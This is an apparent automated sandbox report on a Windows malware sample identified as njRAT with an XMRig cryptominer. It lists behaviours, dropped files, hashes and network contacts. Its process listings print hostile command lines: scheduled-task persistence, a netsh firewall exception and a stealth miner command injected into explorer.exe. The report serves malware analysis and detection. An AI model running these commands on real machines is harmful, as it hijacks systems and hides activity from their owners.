Analysis Overview
SHA256
580e02ff0dba47c835a4abff35ca5ecfe8e04e08206739936556b696141ed844
Threat Level: Known bad
The file 6f8798f01a7ec11429f624dbc59b4a32 was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
xmrig
XMRig Miner payload
Modifies Windows Firewall
Drops startup file
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Creates scheduled task(s)
Modifies system certificate store
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-22 11:15
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-22 11:15
Reported
2024-01-22 11:17
Platform
win7-20231215-en
Max time kernel
150s
Max time network
151s
Signatures
njRAT/Bladabindi
xmrig
XMRig Miner payload
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lear.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lear.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lear.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2240 set thread context of 2276 | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (binary blob omitted) | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe
"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"
C:\Users\Admin\AppData\Local\Temp\lear.exe
"C:\Users\Admin\AppData\Local\Temp\lear.exe"
C:\Users\Admin\AppData\Local\Temp\svhost.exe
"C:\Users\Admin\AppData\Local\Temp\svhost.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
C:\Users\Admin\AppData\Local\Temp\services32.exe
"C:\Users\Admin\AppData\Local\Temp\services32.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Local\Temp\services64.exe
"C:\Users\Admin\AppData\Local\Temp\services64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=vlas --pass=a=randomx --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | prohashing.com | udp |
| US | 104.21.10.32:3359 | prohashing.com | tcp |
| US | 104.21.10.32:3359 | prohashing.com | tcp |
| US | 104.21.10.32:3359 | prohashing.com | tcp |
| US | 172.67.189.225:3359 | prohashing.com | tcp |
| US | 104.21.10.32:3359 | prohashing.com | tcp |
| US | 172.67.189.225:3359 | prohashing.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | d96ee436f67f495f2c0fe0b9d815d259 |
| SHA1 | 2a91f603706ac85ca1df067d164584ff02dcbc1b |
| SHA256 | a0a5ac4d1ed0de20cbc822cc9bf8dedbac892675e89da757029bf73e53ae90d3 |
| SHA512 | 59649844315f3ab0eae546d759f786d63e4597d2b412d2d594e8af90939b00e0ba83b79ffb1a8173a0f3f4222dfa85b2226431413de5285f92944eaad90d1b09 |
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | 26df047471cff53f66190d535b2d73f8 |
| SHA1 | ea2483f3323bbbe0b959f409e24cfd514a662ae1 |
| SHA256 | 68548c3b3730d33e005aef791d19ad382048cadce98051ac891b04265cacc4cf |
| SHA512 | 8328178254aa1cbd848d8fc0dcf45daef8e156f55a88c38b56ffa6105b2eb7dd1886a6fefcc5631f385446030500feb2963cd2b077c88649b1fdaefc337d2153 |
C:\Users\Admin\AppData\Local\Temp\svhost.exe
| MD5 | 696f2e0facba8c9bc7e2269986bada95 |
| SHA1 | aaa3ce178ba47c0e370c3ca40b99654cf61d99dd |
| SHA256 | de781ab98b48f1d32a0eac30ab8e9f3d0de9d532db7720fd0a803f227abb039a |
| SHA512 | afa581a6e90aac8b6dc99fa15bfcf078d83af623bee1d79ed9f7578160d6651fa80f2deaf3b43d9a5082442cb82b9e5fd2c3d18d51d5f7cd52182115511baaeb |
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | 97daf8fe1ab31512c47821ea389434f4 |
| SHA1 | 0db20bdf1704d44af9fe9e5e882fe455c2b9f19f |
| SHA256 | a2710f1b04f006151c264ece03e7ea14f6e0066f4af4166da0220b75af413a34 |
| SHA512 | 35f596628e9793959d280f8309d5aaef264813753d414fca5a38dcdce7b817859d662e210f591d974585dfcb77a2aca406a6710e446876dad47a97295a58e202 |
\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | 7d97ebd020adc594094c05b1aa04bc9c |
| SHA1 | 2522f47426b2fb9456d0895c26017addeab13b65 |
| SHA256 | 9ee54245dca5e903968f92a6411375a7c89fb2085a92ac03d3198feffe610c97 |
| SHA512 | 87d9127610d2aa5beb0dfa92e1523034be2d455ffedb9a11f3debf98801292fe372351b23049bbe683e27cffe686ba4dac1eb728bff7850bacbb4a04454630bc |
\??\c:\users\admin\appdata\local\temp\rarsfx0\1_protected.exe
| MD5 | 6369fc45d88a6a4ac494378f82c0646b |
| SHA1 | d034443895d58921619959e14234620b7f169170 |
| SHA256 | cbe1ee8865b7708628a772ed90466930c25addc2f74bb96556b98b395737bced |
| SHA512 | 2ca85136a23365d605d494eef31f576b99854156b8b065e813ab6fece43007764ee7e4c6f69552f1466110728860e6b5c325ae3f50655f796ab5611b4d3d9ab4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | cf9824d2ca8b577db5549aa9d7272d28 |
| SHA1 | 7dbd28e93fe90521d2803a6e5bf4d44817816e67 |
| SHA256 | 2ca500e8dcdd8323efe3465c40d8ba496279ec4eff1dee732a89dadc1b595817 |
| SHA512 | a45207618ed98a4e51e9e0b9b27de437b9bded694810c79dc8fa2eae8bf0a658c6f615b1ed24b1ec463f6eaf23eae749c662d314c9a1a3270ce6aa0a12a40367 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | 43e563ba4d0bb252af7a2aa6283e927e |
| SHA1 | 18839e465ebb25bbe676f5837d15f1d19919f073 |
| SHA256 | 2805cbf90f4b2f3465de020ec50d9b5cae1422522bb2e4e92743448cf7878483 |
| SHA512 | d76254f0852878fa7701c32aadb2654597227afe236bf734cd878106ab8f487de0ac91ae286828306993b5d476a91b08fc1d010b3c027a19727a99b9bad977e5 |
\Users\Admin\AppData\Local\Temp\services32.exe
| MD5 | f01e43f37937d0b65e9a8a43c5750f3d |
| SHA1 | 242bb759a05f6807f890515b8276102613ed7d41 |
| SHA256 | e6f5c7bcdd6c041820e510aa767641e37d56b4bf0d9de20bfa3bb3fb8c573409 |
| SHA512 | 02c4fd0520b95a4f91ec7a9837953b6fc0e0b1ec53c0fe01f9389c07bbed210f14132c2c9796f241498d65eb2179fe333d7ff884883ba981a24ffcf160f0c289 |
C:\Users\Admin\AppData\Local\Temp\services32.exe
| MD5 | d08a0702492b7702e726648a903c2bd4 |
| SHA1 | 4c6d93108d2afa87929cd68af747c50dbe3fc690 |
| SHA256 | 3b6162e0b0c8133baac36786a243746a4dfc4622417f4b6fa230d5fb8f03694a |
| SHA512 | 3d21998ef5dd6c410f425cb2571e1fdae7dd363428ccb8434ed89062b0a39cc19e7854e3af4729aebdf9a4a4968f1093ef7df7aff0260b34e4d13ef5ec29b8b6 |
\??\c:\users\admin\appdata\local\temp\services32.exe
| MD5 | 440839afc5edfabe611d23ba63689b18 |
| SHA1 | 66c1b3d5eecbcb50fdf98722de5242368ab6a53a |
| SHA256 | d95be3a4bd093e26c2f5cd8c6c76f9efec55c86893189bf9130ed8098398724a |
| SHA512 | 6275aa34dee71eb684afd93d66a9853cafa14ad2edc3842a161577614f224b92aaf4dad4bade85d88ab2d9b039672c6007b270e3fb3c839a2a609f6e2437324f |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | 04fc844c321ea6afe57596424daab540 |
| SHA1 | 306ee4be783571310d75593616516c2fbb0d7081 |
| SHA256 | 05a8f4dbdf680ae0d47645082f476b39481b9e64c8c9ce6da10cf442a240417f |
| SHA512 | 3b5c39afd324388bc63cc4224c9137636f6e3cb8128aa4ce3494fc827543125d5da869dc640197a5a6c7ddf7c92b8eeb4618bca58ba5f25722f13701168f157c |
\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | c882daefb788528213d6a6b879414c91 |
| SHA1 | cc5cee72aa8f93f357e7cce01affb4b64255b960 |
| SHA256 | 3fc81c9304beaf3adaed483fb682191fdb36cd596a1469b915cac98a26d9e7c6 |
| SHA512 | 4a8bd06afce4550cc685fd52156ff04cb047dc78d94c6df6e88dd31f60c0723189681bdbbe1b88499ef929542787c3a90475b9a0cc5b645256442a0e8fcc7cc4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | a065800e1cf43312fa33261cd7e43514 |
| SHA1 | fa715606adebabfffdf1643a693ce0bec63cc6a7 |
| SHA256 | 56be1fe09d7fa000edbed809bc33ad6f06d2e3f3c08051658670063ae1977e26 |
| SHA512 | abd1ded5b7b34762a166177492bb99624c31ee3111445ca67ea09242e4fb7a74c3a8b12c2615394411314b38b2fc450f4a250a62352bec76388686e33fbbce60 |
\??\c:\users\admin\appdata\local\temp\rarsfx0\2_protected.exe
| MD5 | 66698ddf93da72c025ce6c61626eea8b |
| SHA1 | 783b08bbc61396da8671d0947f9b807c55b06261 |
| SHA256 | 9d60a66aae0b25af5fc1358a1e0c25f1d59aafb9ba4d6864aeaac7d824a3471f |
| SHA512 | 6e0e0dbf0b14b9b4c4ee393c32205ef32b678a9ba3196e62d52bc7bb35c2a75747be5218777ff735b894e9abc3867e7be3ebf605e4e965d1dc45a8cda4e7cd1f |
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
| MD5 | 7f13e2b226baf92c8c7aa34606a33043 |
| SHA1 | 957594155513bcb9adf119fbd683d6222c97b6f7 |
| SHA256 | 82daa75486edff63daa1eb62220e8aaeea23691151ba98f9f3b8b87f51428e3d |
| SHA512 | a164fc7ecdd842fcedea61025fd8f9abe7c9efa06d08493be2413a052fa91e9c1818bbf006475b3f740174a0c7e6e474ee7f5fa2b703b4f164a8849d4dcc02a1 |
\Users\Admin\AppData\Local\Temp\services64.exe
| MD5 | 16ebd4fca1d15d1f5f7081a7d0c70117 |
| SHA1 | 8e66abef95a4e5c56c2b5969d3768889d83b84fc |
| SHA256 | e8c5369dcbfa832fa2c89505954150bc06949825bbfba45652d672432e4ab0b0 |
| SHA512 | 20de09c6ec7d01a4a8b96245d1a6ff6f4a1ee10e5d845983ea1971c58056ffa35466742e83eef118543b29bdb50704cf95dca774fe0dc83ac148d0f7ad12a2ea |
C:\Users\Admin\AppData\Local\Temp\services64.exe
| MD5 | ad8e32e560028a95b88238df5dd1921d |
| SHA1 | e675044b71e6e7ad85adb9de4cb7015af7b6e3a8 |
| SHA256 | f019927fb60f2d68540e35230d376caff608e2d143eb66ff79eac80ae206e43a |
| SHA512 | e7f8add5e9e3b6f00b9541ebe93524043f2db11fb48afaacb0b26b41a2fe3aa0ad462546a1a393d21770584c4b4ce6aa885dad1b2b2886b77c76033f4e57291c |
\??\c:\users\admin\appdata\local\temp\services64.exe
| MD5 | 3eb73cdf10bf20d731c60ca91225f411 |
| SHA1 | ff7b384874010eb08a5cb8e82dd79ebd2c93b38b |
| SHA256 | da1914439fd3b9730c3f0499a733da680332199ffef646d115a731a1877bbcfc |
| SHA512 | 056b909bd8576618a69d004e225aab3ad32d48402d25825a6896c54d70e0a3b958f3421ae2fa00cdf29303df597b942ca74242342440ad039f3c747cfb7f3dfb |
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 16379e3af6a104ba50f80465c44297b3 |
| SHA1 | 23fa672955f7519aa8ab000977560fa952069052 |
| SHA256 | a37d2858b1c7aa02fc4ff57dd4c0f6822fa280c3fae16ca0d79d4df51db1ceae |
| SHA512 | 97a19c76e28214e5cff3bc0164edbb5f52f627a414a2e9008033b398549641d434aad8f97095399c994f7dfb372eb72bafbf706a31877cc2bb7dabb229d0db59 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-22 11:15
Reported
2024-01-22 11:17
Platform
win10v2004-20231222-en
Max time kernel
149s
Max time network
147s
Signatures
njRAT/Bladabindi
xmrig
XMRig Miner payload
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\lear.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svhost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lear.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2424 set thread context of 4072 | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe
"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"
C:\Users\Admin\AppData\Local\Temp\lear.exe
"C:\Users\Admin\AppData\Local\Temp\lear.exe"
C:\Users\Admin\AppData\Local\Temp\svhost.exe
"C:\Users\Admin\AppData\Local\Temp\svhost.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe"
C:\Users\Admin\AppData\Local\Temp\services32.exe
"C:\Users\Admin\AppData\Local\Temp\services32.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Local\Temp\services64.exe
"C:\Users\Admin\AppData\Local\Temp\services64.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=vlas --pass=a=randomx --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv kJYy6oQToUmTHYGhxZtTsw.0.2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 104.21.10.32:3359 | | tcp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| GB | 88.221.134.18:80 | | tcp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 104.21.10.32:3359 | | tcp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 104.21.10.32:3359 | | tcp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 104.21.10.32:3359 | | tcp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 172.67.189.225:3359 | | tcp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
